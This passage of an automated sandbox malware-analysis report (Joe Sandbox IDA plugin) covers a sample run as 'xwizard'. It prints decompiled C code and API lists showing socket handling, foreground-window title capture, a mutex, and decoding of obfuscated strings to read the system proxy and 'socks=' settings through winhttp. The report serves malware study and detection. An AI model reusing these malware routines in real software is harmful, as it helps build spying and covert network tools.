						_v88 = _t35;
						_v92 = 0x98000004;
						 *_t41 = _t37;
						_v44 = 1;
						_v40 = 0x2bf20;
						_v36 = 0x1388;
						L0041F95C(); // executed
						_t41 = _t41 - 0x24;
					}
				}
				if((_t39 & 0x00000004) == 0) {
					return _t35;
				} else {
					_t36 =  &_v24;
					_v60 = 1;
					_v68 = 1;
					_v72 = 6;
					_v76 = _t37;
					_v64 = _t36;
					_v24 = 1;
					L0041F8F4();
					return _t36;
				}
			}

0x00405217
0x0040521a
0x0040521e
0x00405228
0x0040522a
0x0040522e
0x00405236
0x00405239
0x00405241
0x00405245
0x0040524a
0x0040524a
0x00405253
0x00405259
0x0040525d
0x00405265
0x0040526d
0x00405275
0x00405278
0x0040527c
0x00405281
0x00405286
0x0040528b
0x0040528d
0x00405291
0x00405299
0x004052a1
0x004052a5
0x004052ad
0x004052b5
0x004052bd
0x004052c1
0x004052c9
0x004052cc
0x004052d4
0x004052dc
0x004052e4
0x004052e9
0x004052e9
0x0040528b
0x004052ef
0x00405327
0x004052f1
0x004052f1
0x004052f5
0x004052fd
0x00405305
0x0040530d
0x00405310
0x00405314
0x00405319
0x00000000
0x0040531e

APIs

ioctlsocket.WS2_32 ref: 00405245
setsockopt.WS2_32 ref: 00405281
WSAIoctl.WS2_32 ref: 004052E4
setsockopt.WS2_32 ref: 00405319

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: setsockopt$Ioctlioctlsocket
String ID:
API String ID: 1196899187-0
Opcode ID: d49987523794ce8ed4bb060c03339be3ab30899d0a78e50f53fa3c85019847e2
Instruction ID: 20f5eab9ee5944eb72183824eaa05ad15d37d7ba85e5585d89411a70b12a9a58
Opcode Fuzzy Hash: d49987523794ce8ed4bb060c03339be3ab30899d0a78e50f53fa3c85019847e2
Instruction Fuzzy Hash: 0221A7B1409741AED340EF59D18835BFFE0AF84748F80992EF89457251D3B999888F87

Uniqueness

Uniqueness Score: -1.00%

Function 0041328F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

NetWkstaGetInfo.NETAPI32 ref: 004132B1
NetApiBufferFree.NETAPI32 ref: 004132D8

Strings

f, xrefs: 00413296

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: BufferFreeInfoWksta
String ID: f
API String ID: 773480902-1993550816
Opcode ID: adce9d268615c65e9b031c2403f5ee47e1848614fcce32b1b10be943295c3ccf
Instruction ID: bf6d1e5e530aa92c88c9cb547170410969f3c4ca1d96cbd027a6ecb1b54c6bd2
Opcode Fuzzy Hash: adce9d268615c65e9b031c2403f5ee47e1848614fcce32b1b10be943295c3ccf
Instruction Fuzzy Hash: 19F0F8B45083018FC704EF25C185B5BBBE1BF88304F40886DE88487354D379D58ACB96

Uniqueness

Uniqueness Score: -1.00%

Function 00408AB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(?,?,?,?,?,?,?,00409119), ref: 00408ACD
GetLastError.KERNEL32 ref: 00408AE0

Strings

d%B, xrefs: 00408AB6

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: d%B
API String ID: 1925916568-3233696437
Opcode ID: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
Instruction ID: ad06f29d9f34d8de5c37fb948c6dfac14eb5c16bc83129ba4182c5028b8a9bce
Opcode Fuzzy Hash: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
Instruction Fuzzy Hash: FED05EB4504701AAD714FF2982453993EE05B40308F84843EDC88C3796E3BD81DD8B1B

Uniqueness

Uniqueness Score: -1.00%

Function 00405CC4, Relevance: 4.6, APIs: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00405CC4(signed int __eax, void* __edx, intOrPtr _a4, char _a8) {
				intOrPtr _v284;
				char _v288;
				signed int _v292;
				char _v296;
				signed int _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v348;
				signed int _t21;
				intOrPtr _t24;
				void* _t25;
				char _t26;
				char* _t27;
				signed int _t28;
				signed int* _t29;
				intOrPtr* _t30;

				_t25 = __edx;
				_t21 = __eax;
				_t29 =  &_v316;
				_t24 = _a4;
				_t26 = _a8;
				_t27 =  &_v288;
				_t28 = _t24 + 1;
				while(1) {
					_v284 = _t24;
					_v288 = 1;
					_v296 = _t26;
					_v292 = 0;
					if(_t26 != 0) {
						break;
					}
					_v316 = 0;
					_v320 = 0;
					_v324 = _t27;
					_v328 = 0;
					 *_t29 = _t28;
					L0041F904();
					_t29 = _t29 - 0x14;
					if(_t21 == 0) {
						continue;
					}
					L6:
					if(_t21 < 0) {
						L5:
						return 0;
					}
					_v348 = _t27;
					 *_t30 = _t24;
					L0041F94C();
					_push(_t25);
					_push(_t25);
					return _t21 & 0xffffff00 | _t21 != 0x00000000;
				}
				_t21 =  &_v296;
				_v320 = 0;
				_v324 = _t27;
				_v328 = 0;
				 *_t29 = _t28;
				_v316 = _t21;
				L0041F904(); // executed
				_t30 = _t29 - 0x14;
				if(_t21 != 0) {
					goto L6;
				}
				goto L5;
			}

0x00405cc4
0x00405cc4
0x00405cc8
0x00405cce
0x00405cd5
0x00405cdc
0x00405ce0
0x00405ce3
0x00405ce5
0x00405ce9
0x00405cf1
0x00405cf5
0x00405cfd
0x00000000
0x00000000
0x00405cff
0x00405d07
0x00405d0f
0x00405d13
0x00405d1b
0x00405d1e
0x00405d23
0x00405d28
0x00000000
0x00000000
0x00405d5b
0x00405d5d
0x00405d57
0x00000000
0x00405d57
0x00405d5f
0x00405d63
0x00405d66
0x00405d6d
0x00405d6e
0x00000000
0x00405d6f
0x00405d2c
0x00405d30
0x00405d38
0x00405d3c
0x00405d44
0x00405d47
0x00405d4b
0x00405d50
0x00405d55
0x00000000
0x00000000
0x00000000

APIs

select.WS2_32 ref: 00405D1E
select.WS2_32 ref: 00405D4B
__WSAFDIsSet.WS2_32 ref: 00405D66

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: a1cf67d523e38ab282052ba767e4d7ed1a34ce180a81d7b67339777580b685cf
Instruction ID: e4f2ceb084e057a26f4344f627522697bcbae48ed975df61c26fef9454d4b794
Opcode Fuzzy Hash: a1cf67d523e38ab282052ba767e4d7ed1a34ce180a81d7b67339777580b685cf
Instruction Fuzzy Hash: 26114CB05087059FE310AF26C54876BFBE8EFC4758F00892FE89897281D379D5498F96

Uniqueness

Uniqueness Score: -1.00%

Function 0041317C, Relevance: 4.5, APIs: 3, Instructions: 39COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00413193
GetWindowTextW.USER32 ref: 004131B3
WideCharToMultiByte.KERNEL32 ref: 004131F6

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Window$ByteCharForegroundMultiTextWide
String ID:
API String ID: 2492211857-0
Opcode ID: 66d348306cd4d6e08c150d2591b3561f405742941a1a59f410c48e2ec4514cc5
Instruction ID: 2103f98854d31d6ee21eef8c691fbd4061408f6fabc572c20ce2be922a60f6fa
Opcode Fuzzy Hash: 66d348306cd4d6e08c150d2591b3561f405742941a1a59f410c48e2ec4514cc5
Instruction Fuzzy Hash: F00140B04083019AD310FF26D54535BFFE4AFC4758F008A1EE49887255D3788689CB87

Uniqueness

Uniqueness Score: -1.00%

Function 00405959, Relevance: 4.5, APIs: 3, Instructions: 16networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 0040596E
ExitProcess.KERNEL32 ref: 00405980
InitializeCriticalSection.KERNEL32 ref: 0040598C

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CriticalExitInitializeProcessSectionStartup
String ID:
API String ID: 3456047655-0
Opcode ID: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
Instruction ID: 24ad92727fe000e7c60640d94de1f7f21ee868b5df478abe0a14dc0806b9406b
Opcode Fuzzy Hash: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
Instruction Fuzzy Hash: A4D012F0504301AEE710BF51D4057BA7AE8AB41310F41483EA8D086242D77D448D4AA7

Uniqueness

Uniqueness Score: -1.00%

Function 00CC06E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExA.KERNELBASE(C:\,00000000,?,00000000), ref: 00CC0715

Strings

C:\, xrefs: 00CC0711, 00CC0714

Memory Dump Source

Source File: 0000000E.00000002.863948201.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_cc0000_xwizard.jbxd

Similarity

API ID: DiskFreeSpace
String ID: C:\
API String ID: 1705453755-3404278061
Opcode ID: d5a6d4ecf3d2871be30a7d4c171c207394f87c03fb417a21a7da664a344604cb
Instruction ID: 8e243da4b4dc9306afa6285f3f44a3c0c6e5efc667b8564222f258b7af53fe5c
Opcode Fuzzy Hash: d5a6d4ecf3d2871be30a7d4c171c207394f87c03fb417a21a7da664a344604cb
Instruction Fuzzy Hash: 7BF08972904209EBEF15A6E4CC96FEF737CAB00344F24046DD51256141E970EB459B61

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE7, Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00405F3C
__WSAFDIsSet.WS2_32 ref: 00405FA8

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 2cc43028804df6e7031d7bdb477b00ee3d25e214831442e515feb843a0defbf8
Instruction ID: 3284ca1fbe294b016ba812f83614f168e55cc85ae0225a429d2d4095fe025a78
Opcode Fuzzy Hash: 2cc43028804df6e7031d7bdb477b00ee3d25e214831442e515feb843a0defbf8
Instruction Fuzzy Hash: 4B111CB05187419EE710AF25C54479BBBE8FF88308F00892EE89897281D77C85458F56

Uniqueness

Uniqueness Score: -1.00%

Function 004051B5, Relevance: 3.0, APIs: 2, Instructions: 31networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32 ref: 004051C5
htons.WS2_32 ref: 00405202

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: gethostbynamehtons
String ID:
API String ID: 2664724638-0
Opcode ID: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
Instruction ID: c7c63fa6584d291762938b61b036814656b365f8fb5761cd288c2352f27d1738
Opcode Fuzzy Hash: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
Instruction Fuzzy Hash: 6AF01DB45157109FC710EF29C48165BBBE0FF48314F06895DE8C89B316E238D880CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00407EF4, Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00407EFE

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e3c58914c79796914ae3652b9338830a73e9f14980a586d20e581d2826090cc4
Instruction ID: d679871287b4664fab267dfb904784a560a8627629bc176350aa90e446a3ed10
Opcode Fuzzy Hash: e3c58914c79796914ae3652b9338830a73e9f14980a586d20e581d2826090cc4
Instruction Fuzzy Hash: D1B01274904B4047C700BF6C854245B7AE87A44304FC409ACF8C4D3303E13C82998A6B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408417, Relevance: 49.3, APIs: 13, Strings: 15, Instructions: 294
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E00408417(void* __edx, void* __eflags, int _a8, void* _a11, void* _a12, void* _a13, void* _a14, void* _a15, void* _a16, void _a17, void* _a24, intOrPtr _a28, void* _a36, char _a48, char _a56, void _a60, void _a64, intOrPtr _a80, char _a100, char _a101, char _a102, char _a103, void _a104, char _a105, void _a112, void _a128, void* _a140, char _a172, char _a204, char _a236) {
				void _v0;
				void _v4;
				void _v8;
				void* _v12;
				void* _v16;
				void* _v24;
				void* _v28;
				void* _v32;
				void _v40;
				void* _v44;
				void* _v48;
				CHAR* _t121;
				void* _t124;
				struct HINSTANCE__* _t125;
				_Unknown_base(*)()* _t126;
				intOrPtr _t127;
				struct HINSTANCE__* _t128;
				_Unknown_base(*)()* _t129;
				void* _t130;
				void* _t138;
				void* _t142;
				void* _t146;
				void* _t147;
				void* _t151;
				void* _t152;
				void* _t156;
				intOrPtr _t160;
				int _t162;
				void* _t165;
				void* _t167;
				void* _t180;
				void* _t184;
				void* _t185;
				void* _t189;
				intOrPtr* _t198;
				intOrPtr _t199;
				void* _t200;
				void _t201;
				intOrPtr _t202;
				void _t203;
				void* _t214;
				CHAR* _t215;
				CHAR* _t232;
				_Unknown_base(*)()* _t234;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t242;
				void* _t243;
				struct HINSTANCE__* _t245;
				void* _t246;
				void* _t248;
				void* _t249;
				void* _t250;
				intOrPtr* _t255;

				_t214 = __edx;
				_t250 = _t249 - E0041F3F0(0x110c);
				_t121 = E004081AA("U4R-55sTsdR");
				_t198 = GetProcAddress(LoadLibraryA("winhttp.dll"), _t121);
				_v16 = "U4R-55sEd590WfZ_W0u0i";
				_t124 = E004081AA(_t215);
				_v16 = "winhttp.dll";
				_t125 = LoadLibraryA(_t215);
				_v12 = _t124;
				_v16 = _t125;
				_t126 = GetProcAddress(_t245, _t232);
				_push(_t214);
				_push(_t214);
				if(_t198 != 0 && _t126 != 0) {
					memcpy( &_a104, L"InternetProxy", 7 << 2);
					_t204 = 0;
					_v0 = 0;
					_v4 = 0;
					_v8 = 0;
					_v12 = 1;
					_v16 =  &_a104;
					_a28 = 0;
					_t160 =  *_t198();
					_t250 = _t250 + 0xc - 0x14;
					_t202 = _t160;
					if(_t160 != 0) {
						_t214 =  &_a48;
						_t162 = memset( &_a60, _a8, 6 << 2);
						_a60 = 1;
						_a64 = 3;
						_a80 = 1;
						memset(_t214, _t162, 3 << 2);
						_t165 = memcpy( &_a112, L"http://www.yandex.com", 0xb << 2);
						_t255 = _t250 + 0x24;
						_t204 = 0;
						_v28 = _t165;
						_v24 = _t214;
						 *_t255 = _t202;
						_v32 =  &_a112;
						_t167 = _v0();
						_t250 = _t255 - 0x10;
						if(_t167 != 0) {
							memcpy( &_a17, "socks=", 7);
							_t250 = _t250 + 0xc;
							_t204 = 0;
							_v40 = _t203;
							_v44 = _t248;
							_v48 =  &_a17;
							 *_t250 =  &_a204;
							if(E00408306(0, _t261) != 0) {
								 *_t250 = 0x8c;
								_t180 = malloc(??);
								_t242 = _t180;
								_v44 = 0x40;
								_v48 = _t248;
								 *_t250 = _t180 + 4;
								E00412548();
								 *_t242 = 0;
								 *_t250 = _t203;
								 *((intOrPtr*)(_t242 + 0x44)) = E00412666(0);
								_t184 =  *0x42b304; // 0x0
								 *0x42b304 = _t242;
								 *(_t242 + 0x88) = _t184;
								 *_t250 = 0x8c;
								_t185 = malloc(??);
								_t243 = _t185;
								_v44 = 0x40;
								_v48 = _t248;
								 *_t250 = _t185 + 4;
								E00412548();
								 *_t243 = 2;
								 *_t250 = _t203;
								 *((intOrPtr*)(_t243 + 0x44)) = E00412666(0);
								_t189 =  *0x42b304; // 0x0
								 *0x42b304 = _t243;
								 *(_t243 + 0x88) = _t189;
								_v44 = 4;
								_v48 = 0x422fa5;
								 *_t250 = 0x4223dc;
								E00412548();
							}
						}
					}
				}
				_t127 = E004081AA("U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0");
				_v16 = "winhttp.dll";
				_t199 = _t127;
				_t128 = LoadLibraryA(??);
				_v12 = _t199;
				_v16 = _t128;
				_t129 = GetProcAddress(_t204, ??);
				_push(_t199);
				_t234 = _t129;
				_push(_t199);
				if(_t129 != 0) {
					_t130 = malloc(0x10);
					_t200 = _t130;
					_v16 = _t130;
					_t129 =  *_t234();
					_t264 = _t129;
					_push(_t214);
					if(_t129 != 0) {
						_v12 = "%S";
						_t201 =  &_a56;
						_v16 = 0x1000;
						_t246 =  &_a172;
						_v8 =  *((intOrPtr*)(_t200 + 8));
						 *_t250 =  &_a236;
						E004127A8();
						_v12 = 0x1000;
						_v16 = 0x422f70;
						 *_t250 =  &_a236;
						E00412588();
						_v8 = _t201;
						_v12 = _t246;
						_a100 = 0x68;
						_a101 = 0x74;
						_v16 =  &_a100;
						_a102 = 0x74;
						_a103 = 0x70;
						_a104 = 0x3d;
						 *_t250 =  &_a236;
						_a105 = 0;
						_t138 = E00408306(_t204, _t264);
						_t265 = _t138;
						if(_t138 != 0) {
							 *_t250 = 0x8c;
							_t152 = malloc(??);
							_t238 = _t152;
							_v12 = 0x40;
							_v16 = _t246;
							 *_t250 = _t152 + 4;
							E00412548();
							 *_t238 = 3;
							 *_t250 = _t201;
							 *((intOrPtr*)(_t238 + 0x44)) = E00412666(_t204);
							_t156 =  *0x42b304; // 0x0
							 *0x42b304 = _t238;
							 *(_t238 + 0x88) = _t156;
							_v12 = 4;
							_v16 = 0x422fa5;
							 *_t250 = 0x4223dc;
							E00412548();
						}
						memcpy( &_a128, "socks=", 7);
						_t250 = _t250 + 0xc;
						_v8 = _t201;
						_v12 = _t246;
						_v16 =  &_a128;
						 *_t250 =  &_a236;
						_t129 = E00408306(0, _t265);
						if(_t129 != 0) {
							 *_t250 = 0x8c;
							_t142 = malloc(??);
							_t236 = _t142;
							_v12 = 0x40;
							_v16 = _t246;
							 *_t250 = _t142 + 4;
							E00412548();
							 *_t236 = 2;
							 *_t250 = _t201;
							 *((intOrPtr*)(_t236 + 0x44)) = E00412666(0);
							_t146 =  *0x42b304; // 0x0
							 *0x42b304 = _t236;
							 *(_t236 + 0x88) = _t146;
							 *_t250 = 0x8c;
							_t147 = malloc(??);
							_t237 = _t147;
							_v12 = 0x40;
							_v16 = _t246;
							 *_t250 = _t147 + 4;
							E00412548();
							 *_t237 = 0;
							 *_t250 = _t201;
							 *((intOrPtr*)(_t237 + 0x44)) = E00412666(0);
							_t151 =  *0x42b304; // 0x0
							 *0x42b304 = _t237;
							 *(_t237 + 0x88) = _t151;
							_v12 = 4;
							_v16 = 0x422fa5;
							 *_t250 = 0x4223dc;
							_t129 = E00412548();
						}
					}
				}
				return _t129;
			}

0x00408417
0x00408425
0x0040842e
0x00408450
0x00408452
0x00408459
0x0040845e
0x00408467
0x0040846d
0x00408471
0x00408474
0x0040847b
0x0040847c
0x0040847d
0x0040849b
0x0040849b
0x004084a1
0x004084a9
0x004084b1
0x004084b9
0x004084c1
0x004084c4
0x004084c8
0x004084ca
0x004084cf
0x004084d1
0x004084db
0x004084ed
0x004084f6
0x004084fe
0x00408506
0x0040850e
0x00408520
0x00408520
0x00408520
0x00408522
0x0040852d
0x00408531
0x00408534
0x00408538
0x0040853a
0x0040853f
0x00408648
0x00408648
0x00408648
0x0040864e
0x00408652
0x00408656
0x00408661
0x0040866b
0x00408671
0x00408678
0x0040867d
0x00408682
0x0040868a
0x0040868e
0x00408691
0x00408696
0x0040869c
0x004086a4
0x004086a7
0x004086ac
0x004086b2
0x004086b8
0x004086bf
0x004086c4
0x004086c9
0x004086d1
0x004086d5
0x004086d8
0x004086dd
0x004086e3
0x004086eb
0x004086ee
0x004086f3
0x004086f9
0x004086ff
0x00408707
0x0040870f
0x00408716
0x00408716
0x0040866b
0x0040853f
0x004084d1
0x00408722
0x00408727
0x0040872e
0x00408730
0x00408736
0x0040873a
0x0040873d
0x00408744
0x00408745
0x00408747
0x00408748
0x00408755
0x0040875a
0x0040875c
0x0040875f
0x00408761
0x00408763
0x00408764
0x0040876d
0x00408775
0x00408779
0x00408781
0x00408788
0x00408793
0x00408796
0x004087a2
0x004087aa
0x004087b2
0x004087b5
0x004087be
0x004087c2
0x004087c6
0x004087cb
0x004087d0
0x004087db
0x004087e0
0x004087e5
0x004087ea
0x004087ed
0x004087f2
0x004087f7
0x004087f9
0x004087fb
0x00408802
0x00408807
0x0040880c
0x00408814
0x00408818
0x0040881b
0x00408820
0x00408826
0x0040882e
0x00408831
0x00408836
0x0040883c
0x00408842
0x0040884a
0x00408852
0x00408859
0x00408859
0x0040886f
0x0040886f
0x00408878
0x0040887c
0x00408880
0x0040888b
0x0040888e
0x00408895
0x0040889b
0x004088a2
0x004088a7
0x004088ac
0x004088b4
0x004088b8
0x004088bb
0x004088c0
0x004088c6
0x004088ce
0x004088d1
0x004088d6
0x004088dc
0x004088e2
0x004088e9
0x004088ee
0x004088f3
0x004088fb
0x004088ff
0x00408902
0x00408907
0x0040890d
0x00408915
0x00408918
0x0040891d
0x00408923
0x00408929
0x00408931
0x00408939
0x00408940
0x00408940
0x00408895
0x00408764
0x0040894f

APIs

LoadLibraryA.KERNEL32(?,?,?,?,0040914E), ref: 0040843C
GetProcAddress.KERNEL32(?,?), ref: 00408449
LoadLibraryA.KERNEL32(?,?,?,?,?,0040914E), ref: 00408467
GetProcAddress.KERNEL32 ref: 00408474
malloc.MSVCRT ref: 004085DE
malloc.MSVCRT ref: 00408678
malloc.MSVCRT ref: 004086BF
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040914E), ref: 00408730
GetProcAddress.KERNEL32 ref: 0040873D
malloc.MSVCRT ref: 00408755
malloc.MSVCRT ref: 00408802
malloc.MSVCRT ref: 004088A2
malloc.MSVCRT ref: 004088E9

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Strings

t, xrefs: 004085A7
http://www.yandex.com, xrefs: 004084E8
t, xrefs: 004085B7
t, xrefs: 004087CB
p, xrefs: 004085BC
socks=, xrefs: 0040863E, 00408865
h, xrefs: 004087C6
=, xrefs: 004087E5
h, xrefs: 004085A2
p, xrefs: 004087E0
p/B, xrefs: 004087AA
InternetProxy, xrefs: 00408491
t, xrefs: 004087DB
=, xrefs: 004085C1
@, xrefs: 004088F3

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: malloc$AddressLibraryLoadProc$_vsnprintf
String ID: =$=$@$InternetProxy$h$h$http://www.yandex.com$p$p$p/B$socks=$t$t$t$t
API String ID: 3272051020-3390938176
Opcode ID: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
Instruction ID: 129794d27e18b5d836c16bc2de0120feea3297db44a07732c008f05b0d4f5d07
Opcode Fuzzy Hash: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
Instruction Fuzzy Hash: 09D1F5B0508740AFD710EF25C68479ABBF0BF84744F418C2EE5C897351EBB99989CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00411D8C, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 195windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00411DBD
GetSystemMetrics.USER32 ref: 00411DCC
GetDesktopWindow.USER32 ref: 00411DD4
